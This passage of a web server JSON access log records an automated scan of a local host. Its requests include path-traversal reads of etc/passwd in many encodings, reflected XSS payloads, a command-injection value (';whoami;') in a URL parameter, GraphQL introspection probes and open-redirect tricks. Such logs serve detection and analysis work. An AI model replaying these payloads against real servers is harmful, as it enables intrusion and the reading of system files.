"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.124","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.123","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.123","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.119","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.112","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.101","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /userportal/webpages/myaccount/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.099","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.125","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.116","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.099","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.113","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.065","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.055","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 